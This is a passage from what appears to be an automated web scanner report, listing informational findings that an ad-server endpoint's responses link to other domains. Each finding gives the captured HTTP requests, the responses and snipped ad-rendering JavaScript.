User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 754
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C48000000000031630
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:12 GMT
Content-Length: 754

//<![CDATA[
function getRADIds() { return{"adid":"48000000000031630","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/48000000000031630.1??PID=8031597&UIT=G&TargetID=8247108&AN=1360530400&PG=INV4QA&ASID=6c567eddf32344b0bd88cfa8851ae243" target="_blank"><img src="http://ads2.msads.net/CIS/29/000/000/000/004/822.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.256. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=;ord=1530413745?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2761
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC06=FB=AgEAYQ4OwAwZ; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8195265-T37267164-C73000000000032314
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:52:35 GMT
Content-Length: 2761

//<![CDATA[
function getRADIds() { return{"adid":"73000000000032314","pid":"8195265","targetid":"37267164"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1530413745() {var adCode_1530413745=new Array();adCode_1530413745.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8195265&UIT=G&TargetID=37267164&AN=1530413745&PG=NBCMSN&ASID=c99db5ca4ed044deb124a62572ce3a84&destination=;ord=1530413745?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1530413745.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/
...[SNIP]...

22.257. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCMSN&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2714
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC02=FB=AgEAYQ4UwAwC; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8195334-T37312983-C13000000000033752
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:54:53 GMT
Content-Length: 2714

//<![CDATA[
function getRADIds() { return{"adid":"13000000000033752","pid":"8195334","targetid":"37312983"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2247611() {var adCode_2247611=new Array();adCode_2247611.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_2247611.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903.4;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/G
...[SNIP]...

22.258. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026

The response contains the following link to another domain:

http://ads2.msads.net/CIS/20/000/000/000/010/965.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; FC02=FB=AgEAYQ4UwAwC; FC00=FB=AgEAYQ6guQgB; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 752
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C54000000000030188
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:42 GMT
Content-Length: 752

//<![CDATA[
function getRADIds() { return{"adid":"54000000000030188","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/54000000000030188.1??PID=8031597&UIT=G&TargetID=8247108&AN=35734390&PG=INV4QA&ASID=1534d2e1435d438fa8d65062c6a003f3" target="_blank"><img src="http://ads2.msads.net/CIS/20/000/000/000/010/965.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.259. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INVHP1&AP=1089 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2802
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8013958-T8395935-C18000000000034994
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:56:44 GMT
Content-Length: 2802

//<![CDATA[
function getRADIds() { return{"adid":"18000000000034994","pid":"8013958","targetid":"8395935"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1915357353() {var adCode_1915357353=new Array();adCode_1915357353.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8395935&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1915357353.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3382.no_url_specifiedOX2487/B5076164.5;abr=!ie;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=htt
...[SNIP]...

22.260. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026

The response contains the following link to another domain:

http://ads2.msads.net/CIS/76/000/000/000/011/752.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QA&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 752
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8031597-T8247108-C12000000000036588
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:59:05 GMT
Content-Length: 752

//<![CDATA[
function getRADIds() { return{"adid":"12000000000036588","pid":"8031597","targetid":"8247108"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003L/12000000000036588.1??PID=8031597&UIT=G&TargetID=8247108&AN=37357682&PG=INV4QA&ASID=9e857e42eb3c48638ad88033a370e7b5" target="_blank"><img src="http://ads2.msads.net/CIS/76/000/000/000/011/752.gif" width="120" height="60" alt="Click Here!" border="0" /></a>
...[SNIP]...

22.261. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QB&AP=1026

The response contains the following link to another domain:

http://ads2.msads.net/CIS/79/000/000/000/011/364.gif

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=INV4QB&AP=1026 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FC00=FB=; FC01=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; FC06=FB=AgEAYQ4OwAwZ; s_cc=true; s_sq=%5B%5BB%5D%5D; FC02=FB=AgEAYQ4UwAwC

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 751
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8085302-T8295071-C83000000000032738
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 13:00:13 GMT
Content-Length: 751

//<![CDATA[
function getRADIds() { return{"adid":"83000000000032738","pid":"8085302","targetid":"8295071"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 120, 60);}
tr
...[SNIP]...
<a href="http://g.redacted/2AD0003I/83000000000032738.1??PID=8085302&UIT=G&TargetID=8295071&AN=19546691&PG=INV4QB&ASID=6fc58236a441404a87225f1f24011955" target="_blank"><img src="http://ads2.msads.net/CIS/79/000/000/000/011/364.gif" width="120" height="60" alt="click here" border="0" /></a>
...[SNIP]...

22.262. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetAd?PG=

The response contains the following link to another domain:

http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C01&R=

Request

GET /ADSAdClient31.dll?GetAd?PG= HTTP/1.1
Host: rad.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1; FC01=FB=; FC02=FB=; CULTURE=EN-US; FC00=FB=; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; FC07=FB=; FC08=FB=; s_cc=true; FC09=FB=; FC03=FB=AgEAVQ6ZuagB; FC04=FB=; FC05=FB=; CC=US; FC06=FB=; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; v1st=F66AF379BC0B14B4; SRCHHPGUSR=AS=1; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 89
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 18:08:32 GMT

<img src="http://global.msads.net/defaultads/ads/defaultads/TR.gif?N=C01&R="/>

22.263. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN1&AP=1390

The response contains the following links to other domains:

http://clk.redcated/APM/go/148848786/direct;;wi.728;hi.90/01/
http://redcated/APM/iview/148848786/direct;;wi.728;hi.90/01?click=
http://redcated/APM/view/148848786/direct;;wi.728;hi.90/01/

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PG=SPTSN1&AP=1390 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; s_cc=true; s_sq=%5B%5BB%5D%5D; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2415
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P5960713-T37386627-C21000000000018636
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 01:30:57 GMT
Content-Length: 2415

//<![CDATA[
function getRADIds() { return{"adid":"21000000000018636","pid":"5960713","targetid":"37386627"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);if(paren
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1898056222() {var adCode_1898056222=new Array();adCode_1898056222.push('<iframe src="http://view.atdmt.com/APM/iview/148848786/direct;;wi.728;hi.90/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">\n');adCode_1898056222.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_1898056222.push('document.write(\'<a href="http://clk.atdmt.com/APM/go/148848786/direct;;wi.728;hi.90/01/" target="_blank"><img src="http://view.atdmt.com/APM/view/148848786/direct;;wi.728;hi.90/01/"/></a>
...[SNIP]...

22.264. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCSAT&AP=1089&ONECLICK=1

The response contains the following link to another domain:

http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665?

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=NBCSAT&AP=1089&ONECLICK=1 HTTP/1.1
Host: rad.redacted
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC01=FB=; FC02=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; FC03=FB=AgEAVQ6ZuagB; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2761
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC08=FB=AgEAYQ4mwwwU; expires=Tue, 29-Jan-2013 12:00:00 GMT; domain=.rad.redacted; path=/; HttpOnly
X-RADID: P8261482-T37486885-C73000000000032314
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 12:49:25 GMT
Content-Length: 2761

//<![CDATA[
function getRADIds() { return{"adid":"73000000000032314","pid":"8261482","targetid":"37486885"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_1781205665() {var adCode_1781205665=new Array();adCode_1781205665.push('<IFRAME SRC="http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n');adCode_1781205665.push('<scr'+'ipt language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6036.149339.MICROSOFTONLINE/B5123903;abr=!ie;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/
...[SNIP]...

22.265. http://rad.redacted/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.redacted
Path:	/ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:

http://rad.redacted/ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&PG=MSNREC&AP=1089

The response contains the following link to another domain:

http://ads2.msads.net/CIS/119/000/000/000/012/553.jpg

Request

